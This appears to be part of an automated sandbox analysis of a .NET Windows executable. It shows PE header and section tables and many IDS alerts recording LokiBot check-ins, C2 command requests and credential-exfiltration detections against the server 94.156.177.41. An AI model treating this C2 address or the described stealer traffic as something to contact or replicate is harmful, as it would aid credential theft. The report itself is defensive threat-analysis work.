                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xadd3c0x4f.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x19f0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xadc000x3608
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xabd940xabe0089156d02495e78914c1eb5dbd6714be4False0.7683068181818182data7.401526227264673IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xae0000x19f00x1a000f8b6e63385fd4d0d405f5a16f287baeFalse0.6604567307692307data6.061547500887534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xb00000xc0x20027c632a4aa502aed1d4875d325175a71False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xae1180x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.8129432624113475
                                                                                    RT_ICON0xae5800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.7136491557223265
                                                                                    RT_GROUP_ICON0xaf6280x22data0.9411764705882353
                                                                                    RT_VERSION0xaf64c0x3a0data0.4170258620689655
                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-07T12:31:59.242781+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.450139TCP
                                                                                    2025-01-07T12:32:00.796955+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973594.156.177.4180TCP
                                                                                    2025-01-07T12:32:00.796955+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973594.156.177.4180TCP
                                                                                    2025-01-07T12:32:00.796955+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973594.156.177.4180TCP
                                                                                    2025-01-07T12:32:01.519943+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973594.156.177.4180TCP
                                                                                    2025-01-07T12:32:01.754699+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973794.156.177.4180TCP
                                                                                    2025-01-07T12:32:01.754699+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973794.156.177.4180TCP
                                                                                    2025-01-07T12:32:01.754699+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973794.156.177.4180TCP
                                                                                    2025-01-07T12:32:02.466654+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973794.156.177.4180TCP
                                                                                    2025-01-07T12:32:02.549908+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973994.156.177.4180TCP
                                                                                    2025-01-07T12:32:02.549908+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973994.156.177.4180TCP
                                                                                    2025-01-07T12:32:02.549908+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973994.156.177.4180TCP
                                                                                    2025-01-07T12:32:03.275190+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973994.156.177.4180TCP
                                                                                    2025-01-07T12:32:03.275190+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973994.156.177.4180TCP
                                                                                    2025-01-07T12:32:03.316472+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449739TCP
                                                                                    2025-01-07T12:32:03.602114+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.4180TCP
                                                                                    2025-01-07T12:32:03.602114+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.4180TCP
                                                                                    2025-01-07T12:32:03.602114+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.4180TCP
                                                                                    2025-01-07T12:32:04.338995+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974094.156.177.4180TCP
                                                                                    2025-01-07T12:32:04.338995+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974094.156.177.4180TCP
                                                                                    2025-01-07T12:32:04.346344+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449740TCP
                                                                                    2025-01-07T12:32:04.490438+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974194.156.177.4180TCP
                                                                                    2025-01-07T12:32:04.490438+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974194.156.177.4180TCP
                                                                                    2025-01-07T12:32:04.490438+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974194.156.177.4180TCP
                                                                                    2025-01-07T12:32:05.248744+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974194.156.177.4180TCP
                                                                                    2025-01-07T12:32:05.248744+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974194.156.177.4180TCP
                                                                                    2025-01-07T12:32:05.262504+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449741TCP
                                                                                    2025-01-07T12:32:05.412187+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974294.156.177.4180TCP
                                                                                    2025-01-07T12:32:05.412187+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974294.156.177.4180TCP
                                                                                    2025-01-07T12:32:05.412187+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974294.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.009365+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974294.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.009365+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974294.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.009649+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449742TCP
                                                                                    2025-01-07T12:32:07.187246+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974394.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.187246+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974394.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.187246+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974394.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.935086+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974394.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.935086+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974394.156.177.4180TCP
                                                                                    2025-01-07T12:32:07.939892+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449743TCP
                                                                                    2025-01-07T12:32:08.083804+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974494.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.083804+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974494.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.083804+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974494.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.818254+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974494.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.818254+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974494.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.824777+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449744TCP
                                                                                    2025-01-07T12:32:08.974835+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974594.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.974835+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974594.156.177.4180TCP
                                                                                    2025-01-07T12:32:08.974835+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974594.156.177.4180TCP
                                                                                    2025-01-07T12:32:09.731700+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974594.156.177.4180TCP
                                                                                    2025-01-07T12:32:09.731700+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974594.156.177.4180TCP
                                                                                    2025-01-07T12:32:09.737549+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449745TCP
                                                                                    2025-01-07T12:32:10.073415+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974694.156.177.4180TCP
                                                                                    2025-01-07T12:32:10.073415+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974694.156.177.4180TCP
                                                                                    2025-01-07T12:32:10.073415+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974694.156.177.4180TCP
                                                                                    2025-01-07T12:32:10.797050+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974694.156.177.4180TCP
                                                                                    2025-01-07T12:32:10.797050+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974694.156.177.4180TCP
                                                                                    2025-01-07T12:32:10.807324+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449746TCP
                                                                                    2025-01-07T12:32:11.223373+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974794.156.177.4180TCP
                                                                                    2025-01-07T12:32:11.223373+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974794.156.177.4180TCP
                                                                                    2025-01-07T12:32:11.223373+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974794.156.177.4180TCP
                                                                                    2025-01-07T12:32:11.917927+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974794.156.177.4180TCP
                                                                                    2025-01-07T12:32:11.917927+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974794.156.177.4180TCP
                                                                                    2025-01-07T12:32:11.922696+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449747TCP
                                                                                    2025-01-07T12:32:12.117368+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974994.156.177.4180TCP
                                                                                    2025-01-07T12:32:12.117368+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974994.156.177.4180TCP
                                                                                    2025-01-07T12:32:12.117368+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974994.156.177.4180TCP
                                                                                    2025-01-07T12:32:12.853819+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974994.156.177.4180TCP
                                                                                    2025-01-07T12:32:12.853819+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974994.156.177.4180TCP
                                                                                    2025-01-07T12:32:12.858606+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449749TCP
                                                                                    2025-01-07T12:32:13.004316+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975194.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.004316+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975194.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.004316+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975194.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.756413+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975194.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.756413+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975194.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.761638+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449751TCP
                                                                                    2025-01-07T12:32:13.932697+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.932697+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.4180TCP
                                                                                    2025-01-07T12:32:13.932697+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.4180TCP
                                                                                    2025-01-07T12:32:14.647155+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.4180TCP
                                                                                    2025-01-07T12:32:14.647155+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.4180TCP
                                                                                    2025-01-07T12:32:14.651917+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449754TCP
                                                                                    2025-01-07T12:32:14.805465+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.4180TCP
                                                                                    2025-01-07T12:32:14.805465+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.4180TCP
                                                                                    2025-01-07T12:32:14.805465+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.4180TCP
                                                                                    2025-01-07T12:32:15.593522+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.4180TCP
                                                                                    2025-01-07T12:32:15.593522+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.4180TCP
                                                                                    2025-01-07T12:32:15.599338+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449756TCP
                                                                                    2025-01-07T12:32:15.769592+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975894.156.177.4180TCP
                                                                                    2025-01-07T12:32:15.769592+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975894.156.177.4180TCP
                                                                                    2025-01-07T12:32:15.769592+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975894.156.177.4180TCP
                                                                                    2025-01-07T12:32:16.533683+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975894.156.177.4180TCP
                                                                                    2025-01-07T12:32:16.533683+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975894.156.177.4180TCP
                                                                                    2025-01-07T12:32:16.538409+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449758TCP
                                                                                    2025-01-07T12:32:16.694494+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975994.156.177.4180TCP
                                                                                    2025-01-07T12:32:16.694494+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975994.156.177.4180TCP
                                                                                    2025-01-07T12:32:16.694494+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975994.156.177.4180TCP
                                                                                    2025-01-07T12:32:17.445085+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975994.156.177.4180TCP
                                                                                    2025-01-07T12:32:17.445085+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975994.156.177.4180TCP
                                                                                    2025-01-07T12:32:17.450376+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449759TCP
                                                                                    2025-01-07T12:32:17.621099+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976094.156.177.4180TCP
                                                                                    2025-01-07T12:32:17.621099+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976094.156.177.4180TCP
                                                                                    2025-01-07T12:32:17.621099+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976094.156.177.4180TCP
                                                                                    2025-01-07T12:32:18.365851+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976094.156.177.4180TCP
                                                                                    2025-01-07T12:32:18.365851+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976094.156.177.4180TCP
                                                                                    2025-01-07T12:32:18.370632+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449760TCP
                                                                                    2025-01-07T12:32:18.524599+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976194.156.177.4180TCP
                                                                                    2025-01-07T12:32:18.524599+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976194.156.177.4180TCP
                                                                                    2025-01-07T12:32:18.524599+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976194.156.177.4180TCP
                                                                                    2025-01-07T12:32:19.255213+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976194.156.177.4180TCP
                                                                                    2025-01-07T12:32:19.255213+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976194.156.177.4180TCP
                                                                                    2025-01-07T12:32:19.260027+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449761TCP
                                                                                    2025-01-07T12:32:19.413561+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976294.156.177.4180TCP
                                                                                    2025-01-07T12:32:19.413561+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976294.156.177.4180TCP
                                                                                    2025-01-07T12:32:19.413561+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976294.156.177.4180TCP
                                                                                    2025-01-07T12:32:20.161554+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976294.156.177.4180TCP
                                                                                    2025-01-07T12:32:20.161554+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976294.156.177.4180TCP
                                                                                    2025-01-07T12:32:20.166304+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449762TCP
                                                                                    2025-01-07T12:32:20.319720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976394.156.177.4180TCP
                                                                                    2025-01-07T12:32:20.319720+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976394.156.177.4180TCP
                                                                                    2025-01-07T12:32:20.319720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976394.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.055285+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976394.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.055285+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976394.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.060111+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449763TCP
                                                                                    2025-01-07T12:32:21.208840+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976494.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.208840+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976494.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.208840+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976494.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.994686+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976494.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.994686+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976494.156.177.4180TCP
                                                                                    2025-01-07T12:32:21.999489+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449764TCP
                                                                                    2025-01-07T12:32:22.190721+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976594.156.177.4180TCP
                                                                                    2025-01-07T12:32:22.190721+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976594.156.177.4180TCP
                                                                                    2025-01-07T12:32:22.190721+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976594.156.177.4180TCP
                                                                                    2025-01-07T12:32:22.907710+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976594.156.177.4180TCP
                                                                                    2025-01-07T12:32:22.907710+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976594.156.177.4180TCP
                                                                                    2025-01-07T12:32:22.924878+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449765TCP
                                                                                    2025-01-07T12:32:23.083462+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976694.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.083462+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976694.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.083462+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976694.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.819944+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976694.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.819944+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976694.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.824756+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449766TCP
                                                                                    2025-01-07T12:32:23.973870+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976794.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.973870+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976794.156.177.4180TCP
                                                                                    2025-01-07T12:32:23.973870+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976794.156.177.4180TCP
                                                                                    2025-01-07T12:32:24.698249+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976794.156.177.4180TCP
                                                                                    2025-01-07T12:32:24.698249+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976794.156.177.4180TCP
                                                                                    2025-01-07T12:32:24.703088+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449767TCP
                                                                                    2025-01-07T12:32:24.880636+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976894.156.177.4180TCP
                                                                                    2025-01-07T12:32:24.880636+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976894.156.177.4180TCP
                                                                                    2025-01-07T12:32:24.880636+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976894.156.177.4180TCP
                                                                                    2025-01-07T12:32:25.606968+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976894.156.177.4180TCP
                                                                                    2025-01-07T12:32:25.606968+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976894.156.177.4180TCP
                                                                                    2025-01-07T12:32:25.629186+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449768TCP
                                                                                    2025-01-07T12:32:25.829746+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976994.156.177.4180TCP
                                                                                    2025-01-07T12:32:25.829746+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976994.156.177.4180TCP
                                                                                    2025-01-07T12:32:25.829746+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976994.156.177.4180TCP
                                                                                    2025-01-07T12:32:26.577641+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976994.156.177.4180TCP
                                                                                    2025-01-07T12:32:26.577641+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976994.156.177.4180TCP
                                                                                    2025-01-07T12:32:26.582437+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449769TCP
                                                                                    2025-01-07T12:32:26.723358+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977094.156.177.4180TCP
                                                                                    2025-01-07T12:32:26.723358+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977094.156.177.4180TCP
                                                                                    2025-01-07T12:32:26.723358+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977094.156.177.4180TCP
                                                                                    2025-01-07T12:32:27.430547+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977094.156.177.4180TCP
                                                                                    2025-01-07T12:32:27.430547+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977094.156.177.4180TCP
                                                                                    2025-01-07T12:32:27.435344+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449770TCP
                                                                                    2025-01-07T12:32:27.582510+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977194.156.177.4180TCP
                                                                                    2025-01-07T12:32:27.582510+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977194.156.177.4180TCP
                                                                                    2025-01-07T12:32:27.582510+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977194.156.177.4180TCP
                                                                                    2025-01-07T12:32:28.316402+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977194.156.177.4180TCP
                                                                                    2025-01-07T12:32:28.316402+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977194.156.177.4180TCP
                                                                                    2025-01-07T12:32:28.347249+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449771TCP
                                                                                    2025-01-07T12:32:28.619054+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977294.156.177.4180TCP
                                                                                    2025-01-07T12:32:28.619054+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977294.156.177.4180TCP
                                                                                    2025-01-07T12:32:28.619054+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977294.156.177.4180TCP
                                                                                    2025-01-07T12:32:29.349357+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977294.156.177.4180TCP
